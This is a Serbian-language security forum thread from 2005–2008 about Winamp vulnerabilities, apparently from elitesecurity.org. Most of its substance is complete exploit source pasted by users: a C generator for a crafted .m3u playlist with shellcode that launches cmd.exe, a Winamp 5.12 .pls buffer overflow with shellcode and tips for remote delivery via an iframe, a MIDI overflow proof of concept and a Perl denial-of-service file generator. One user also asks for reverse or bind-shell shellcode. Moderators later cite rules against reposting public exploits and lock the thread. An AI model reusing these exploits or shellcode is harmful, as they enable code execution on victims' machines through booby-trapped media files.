[ DownBload @ 17.07.2005. 16:42 ] @
[ DownBload @ 17.07.2005. 16:42 ] @
[ Jimi Hex @ 17.07.2005. 20:38 ] @
Svaka cast
ispravi me ako gresim, ali mislim da sam citao nesto o ovome u jednom od ranijih brojeva Mikra... ali,svejedno sve pohvale [ DownBload @ 18.07.2005. 10:32 ] @
Hehehe...o ovome sigurno jos nisi citao.
[ oxygenne @ 18.07.2005. 12:37 ] @
Ovo je bio exploit za winamp koji se pojavio samo na kratko
#include <stdio.h> #include <stdlib.h> #define HEADER1 "#EXTM3U\n" #define HEADER2 "#EXTINF:0,Exploit Winamp v5.0x-5.05 \n" char shellcode[]= "cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHH" //Padding "\x9F\x44\xDE\x5E" //Offset del JMP ESP en olepro32.dll wXP SP2 "JJJJ" "\x8B\xE5\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6" "\x45\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\xB8" "\xC7\x93\xC2\x77" //Offset de la llamada a system() en msvcrt.dll wXP SP2 "\x50\x8D\x5D\xF8\x53\xFF\xD0\n\r"; int main(int argc, char* argv[]) { FILE *fp; char *sc=(char *)malloc(sizeof(shellcode)+1); printf ("\nExploit Winamp v5.0x-5.05 por Rojodos (modif TaU)\n"); printf ("Testeado en Winamp 5.03 y winXP SP2\n\n"); printf ("Generador de m3u basado en el del primer exploit publicado el 24.11.2004\n"); printf ("en http://www.k-otik.com/exploits/20041124.winampm3u.c.php\n\n"); if (sc == NULL) { printf ("malloc error\n"); return -1; } memset(sc,'\0',sizeof(sc)); memcpy(sc, shellcode, sizeof(shellcode) ); fp = fopen ("test2.m3u","w+"); if (!fp) { printf (" error opening file.\n"); return -1; } fwrite (HEADER1, 1, strlen (HEADER1), fp); fwrite (HEADER2, 1, strlen (HEADER2), fp); fwrite (sc , 1, strlen(sc) , fp); fclose (fp); printf ("\nArchivo <test2.m3u> creado. \n\n"); return 0; } Nikako da napravim portbind shellcode za ovo ili reverse [ DJ_DzoNe @ 28.12.2007. 00:32 ] @
Winamp 5.12 Remote Buffer Overflow Universal Exploit:
Code: /* * * Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day) * Bug discovered & exploit coded by ATmaCA * Web: http://www.spyinstructors.com && http://www.atmacasoft.com * E-Mail: [email protected] * Credit to Kozan * */ /* * * Tested with : * Winamp 5.12 on Win XP Pro Sp2 * */ /* * Usage: * * Execute exploit, it will create "crafted.pls" in current directory. * Duble click the file, or single click right and then select "open". * And Winamp will launch a Calculator (calc.exe) * */ /* * * For to use it remotly, * make a html page containing an iframe linking to the .pls file. * * http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm * */ #include <windows.h> #include <stdio.h> #define BUF_LEN 0x045D #define PLAYLIST_FILE "crafted.pls" char szPlayListHeader1[] = "[playlist]\r\nFile1=\\\\"; char szPlayListHeader2[] = "\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n"; // Jump to shellcode char jumpcode[] = "\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4"; // Harmless Calc.exe char shellcode[] = "\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02" "\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48" "\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4" "\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12" "\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69" "\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6" "\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5" "\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21" "\x61\xdd\x0e\x4d"; int main(int argc,char *argv[]) { printf("\nWinamp 5.12 Remote Buffer Overflow Universal Exploit"); printf("\nBug discovered & exploit coded by ATmaCA"); printf("\nWeb: http://www.spyinstructors.com && http://www.atmacasoft.com"); printf("\nE-Mail: [email protected]"); printf("\nCredit to Kozan"); FILE *File; char *pszBuffer; if ( (File = fopen(PLAYLIST_FILE,"w+b")) == NULL ) { printf("\n [Err:] fopen()"); exit(1); } pszBuffer = (char*)malloc(BUF_LEN); memset(pszBuffer,0x90,BUF_LEN); memcpy(pszBuffer,szPlayListHeader1,sizeof(szPlayListHeader1)-1); memcpy(pszBuffer+0x036C,shellcode,sizeof(shellcode)-1); memcpy(pszBuffer+0x0412,jumpcode,sizeof(jumpcode)-1); memcpy(pszBuffer+0x0422,szPlayListHeader2,sizeof(szPlayListHeader2)-1); fwrite(pszBuffer, BUF_LEN, 1,File); fclose(File); printf("\n\n" PLAYLIST_FILE " has been created in the current directory.\n"); return 1; } Winamp 5.21 - Midi Buffer Overflow in_midi.dll: Code: /* * ********************************************** * * Winamp 5.21 - Midi Buffer Overflow in_midi.dll * * ********************************************** * * PoC coded by: BassReFLeX * * Date: 19 Jun 2006 * * ********************************************** * */ #include <stdio.h> #include <stdlib.h> #include <string.h> void usage(char* file); char header[] = "\x4D\x54\x68\x64\x00\x00" "\x00\x06\x00\x00\x00\x01" "\x00\x60\x4D\x54\x72\x6B" "\x00\x00"; char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF"; int main(int argc,char* argv[]) { system("cls"); printf("\n* ********************************************** *"); printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *"); printf("\n* ********************************************** *"); printf("\n* PoC coded by: BassReFLeX *"); printf("\n* Date: 19 Jun 2006 *"); printf("\n* ********************************************** *"); if ( argc!=2 ) { usage(argv[0]); } FILE *f; f = fopen(argv[1],"w"); if ( !f ) { printf("\nFile couldn't open!"); exit(1); } printf("\n\nWriting crafted .mid file..."); fwrite(header,1,sizeof(header),f); fwrite(badc0de,1,sizeof(badc0de),f); printf("\nFile created successfully!"); printf("\nFile: %s",argv[1]); return 0; } void usage(char* file) { printf("\n\n"); printf("\n%s <Filename>",file); printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid"); exit(1); } Winamp = 5.33 (.AVI File) Remote Denial of Service Exploit: Code: #!/usr/bin/perl # Winamp Buffer Overflow DOS Exploit (0-DAY) # Testet:Ver 5.3 # Discoverd By = DeltahackingTEAM Bug Found & Exploitet By /Farzad.Sharifi(Dr.Trojan) # Risk = High #Exploit(EXE) =http://www.deltahacking.net/exp/winamp.exe #Exploit(PL) =http://www.deltahacking.net/exp/winamp.pl #OverflowFile(Avi) =http://www.deltahacking.net/exp/Dr.Trojan.avi # Winamp Media Player Download=>http://www.winamp.com/ { print "\n================================================================================\n"; print "\ DeltahackingTEAM \n"; print "\ Delta.Secure[A]Gmail.com\n"; print "\ Winamp Buffer Overflow DOS Exploit \n"; print "\We Are:Dr.Trojan,H!v++,D_7j,Impostor,Vpc,LOrd, Dr.Pantagon..Tanks 4 Mr.Str0ke \n"; print "\Http://Deltahacking.net & Http://DeltaSecurity.ir & Http://PersianWhois.com\n "; print "\ n-------------------Exploit Completed(File Create)!-------------------\n"; print "\n================================================================================\n"; } open(avi, ">./Dr.Trojan.avi"); print avi "\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00". print avi "\x4D\x54\x68\x64"; print avi "\x4D\x54\x68\x64"; print avi "\x4D\x54\x68\x64"; print avi "\x4D\x54\x68\x64"; print avi "\x4D\x54\x68\x64"; #0nLy Iran :X #Farzad.Sharifi # milw0rm.com [2007-04-23] [ EArthquake @ 29.12.2007. 12:24 ] @
svaka cast , mada verujem da i ostali korisnici foruma umeju da pogledaju na milw0rm kad im nesto zatreba ...
poenta je sto je bug i exploit u prvom postu nasao i napisao sam Downbload [Ovu poruku je menjao EArthquake dana 29.12.2007. u 19:06 GMT+1] [ Danilo Cvjeticanin @ 29.12.2007. 18:06 ] @
I jos + sto je to sve jako staro i neiskoristivo, 98% exploita sa milw0rm-a mora da se prepravlja. Ko ne veruje neka proba. Public exploiti su uvek neiskoristivi!
[ DJ_DzoNe @ 30.12.2007. 23:30 ] @
Pa jeste u pravu si.
Po tvom nekom razmisljanju onda nista nikad ne bi trebalo napisati nigde. A sto se tice gresaka, verujem da vecini nije tesko prepraviti, u vecini slucajeva bezazlene sintaksicne greske. [ Danilo Cvjeticanin @ 31.12.2007. 08:45 ] @
Pa ovde ne bi trebalo pisati na tu temu. Malo je kompetentnih,a i ti sto znaju nece da pisu jer to po njima nije "kvalitetna" diskusija. Ti ako zelis pisi, meni ne smeta,cak sta vise i volim da procitam i pogledam novije stvari, ali novije! A prepravljanje? Sintaksticne greskice??? lol, nemas pojma!
[ Mitrović Srđan @ 31.12.2007. 09:21 ] @
Citat: Sintaksticne greskice??? :)) [ fearless @ 02.01.2008. 19:59 ] @
Zašto li sam pisao pravilnik?
Citat: 1. Ovo nije mesto gde cete postovati novoobjavljene exploite[1], upozoravati na njih (za to postoje drugi forumi u okviru Security) ili traziti upustva za upotrebu. Ovo jeste mesto gde mozete postovati novoobjavljene ranjivosti[2] i traziti pomoc oko exploitacije istih (ne odnosi se na web aplikacije tipa forumi i slicno). Citat: 3. Stavka 1. iz ovog pravilnika se ne odnosi na one koji postuju exploite koje su sami pisali. Takodje, ako ste otkrili neku ranjivost, slucajno ili sa namerom i zelite da je podelite slobodni ste da to uradite. Tekstove i clanke koji govore o nekim osnovama security codinga (prosti oblici exploitacije buffer overflow-a[3] recimo) postujte ovde ako mislite da mogu nekome pomoci jer nema potrebe otvarati nove teme za tako nesto. [ DJ_DzoNe @ 03.01.2008. 00:27 ] @
OK. Nemam pojma :]
Najlakse je pokrenuti ispravan cod (exploit) i reci ja sam haker! [ Mitrović Srđan @ 03.01.2008. 11:05 ] @
Da je tako svako bi danas bio haker.
[ jovica016 @ 03.01.2008. 13:57 ] @
Citat: DJ_DzoNe: OK. Nemam pojma :] Najlakse je pokrenuti ispravan cod (exploit) i reci ja sam haker! Veliki broj uglavnom bezveznih postova za kratko vreme po svim forumima... jel to slucajno? Ili se meni samo cini.... mozda gresim... Izvinjavam se sto skrecem s teme. [ Shadowed @ 03.01.2008. 15:26 ] @
Citat: fearless: Citat: 1. Ovo nije mesto gde cete postovati novoobjavljene exploite[1], upozoravati na njih (za to postoje drugi forumi u okviru Security) ili traziti upustva za upotrebu. Ovo jeste mesto gde mozete postovati novoobjavljene ranjivosti[2] i traziti pomoc oko exploitacije istih (ne odnosi se na web aplikacije tipa forumi i slicno). Citat: 3. Stavka 1. iz ovog pravilnika se ne odnosi na one koji postuju exploite koje su sami pisali. Takodje, ako ste otkrili neku ranjivost, slucajno ili sa namerom i zelite da je podelite slobodni ste da to uradite. Tekstove i clanke koji govore o nekim osnovama security codinga (prosti oblici exploitacije buffer overflow-a[3] recimo) postujte ovde ako mislite da mogu nekome pomoci jer nema potrebe otvarati nove teme za tako nesto. A posto o originalnoj temi nema diskusije (a i prilicno je zastarelo sada), zakljucacu. Copyright (C) 2001-2025 by www.elitesecurity.org. All rights reserved.
|